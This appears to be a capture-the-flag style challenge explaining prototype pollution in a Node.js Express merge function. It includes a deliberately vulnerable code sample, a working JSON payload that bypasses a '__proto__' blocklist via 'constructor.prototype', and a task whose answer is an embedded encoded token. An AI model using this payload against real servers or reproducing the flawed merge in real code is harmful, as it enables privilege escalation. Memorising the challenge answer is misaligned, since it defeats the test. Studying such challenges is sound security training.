=====================================================================
 PROTOTYPE POLLUTION  —  Node.js merge gadget
=====================================================================
Vulnerable server code (Express, simplified):

    function merge(target, src) {
      for (const k in src) {
        if (k === "__proto__") continue;         // naive blocklist
        if (typeof src[k] === "object" && src[k]) {
          if (!target[k]) target[k] = {};
          merge(target[k], src[k]);              // recursive
        } else {
          target[k] = src[k];
        }
      }
    }

    app.post("/api/prefs", (req, res) => {
      const prefs = {};
      merge(prefs, req.body);                    // user-controlled body
      const u = { name: "guest" };
      // later, a DIFFERENT object is checked for admin rights:
      if (u.isAdmin) {
        res.json({ ok: true, admin_token: "cHJvdG90eXBlX3BvbGx1dGlvbl9wd25lZA==" });
      } else {
        res.json({ ok: true });
      }
    });

Two captured attacker attempts:

  Attempt 1 (blocked):
    POST /api/prefs   {"__proto__": {"isAdmin": true}}
    -> merge() skips the "__proto__" key, nothing polluted
    -> 200 {"ok": true}

  Attempt 2 (worked):
    POST /api/prefs   {"constructor": {"prototype": {"isAdmin": true}}}
    -> merge recurses through constructor.prototype, setting
       Object.prototype.isAdmin = true for EVERY object
    -> now u.isAdmin is true even though u was never touched
    -> 200 {"ok": true, "admin_token": "cHJvdG90eXBlX3BvbGx1dGlvbl9wd25lZA=="}

The top-level "__proto__" blocklist is bypassed via
constructor.prototype, polluting Object.prototype so the unrelated `u`
object inherits isAdmin = true and the admin branch leaks a token.

TASK: take the admin_token from the attempt that WORKED, base64-decode
it, and submit the plaintext.
Answer format: lowercase, words joined by underscores.
